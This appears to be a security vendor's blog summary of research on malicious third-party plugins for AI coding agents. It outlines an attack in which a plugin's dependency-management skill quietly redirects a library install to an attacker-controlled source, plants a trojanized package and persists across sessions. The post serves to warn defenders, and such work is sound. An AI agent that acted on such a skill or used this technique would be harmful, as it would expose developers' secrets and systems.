AI coding assistants are no longer just autocompleting lines of code, they are quietly making decisions for you. Tools like Claude Code are able to read projects, plan multi-step changes, install dependencies, and modify files with minimal human oversight. To make this possible, these assistants rely on plugin marketplaces, where third-party developers can enable ‘skills’ that teach the agent how to manage infrastructure, testing, and dependencies. Though powerful, the model requires a high degree of trust, thus bringing with it a new set of risks.
At a first glance, third-party marketplace plugins are harmless productivity boosters. Connect a marketplace and enable a plugin so your coding assistant becomes smarter about your stack. However, beneath the convenience is a security blind spot: These same skills often run with extremely high privilege and very little transparency on how they make decisions or where the code and dependencies are coming from. The code issue isn’t prompt manipulation or social engineering – it’s compromised automation.
A full technical blog post by SentinelOne’s own Prompt Security team breaks down how a single benign-looking plugin from an unofficial marketplace exposes a dependency management skill. When the developer asks the agent to install a common Python library, that skill quietly redirects the install to an attacker-controlled source, ensuring a trojanized version of the library is pulled into the project. While nothing looks wrong – the library imports cleanly, the example code runs without error – malicious code is now embedded into the environment, capable of exfiltrating secrets, monitoring traffic, or lying dormant until it is triggered at a later time.
What makes this especially concerning is persistence. Marketplace plugins are not one-off interactions. Once enabled, their skills remain available across sessions and will continue to shape how the agent behaves in the future. Rather than a ‘bad prompt’, this effect is more like compromising your package manager itself.
As AI-driven development workflows accelerate, plugin marketplaces and third-party skills are now part of the software supply chain whether teams realize it or not. If your coding assistant can fetch and execute code on your behalf, every plugin installed joins your trust boundary.
Read the full blog post here for a detailed walkthrough of the attack mechanics and learn why dependency skills are such a powerful, but under-modeled, risk.
Third-Party Trademark Disclaimer:
All third-party product names, logos, and brands mentioned in this publication are the property of their respective owners and are for identification purposes only. Use of these names, logos, and brands does not imply affiliation, endorsement, sponsorship, or association with the third-party.
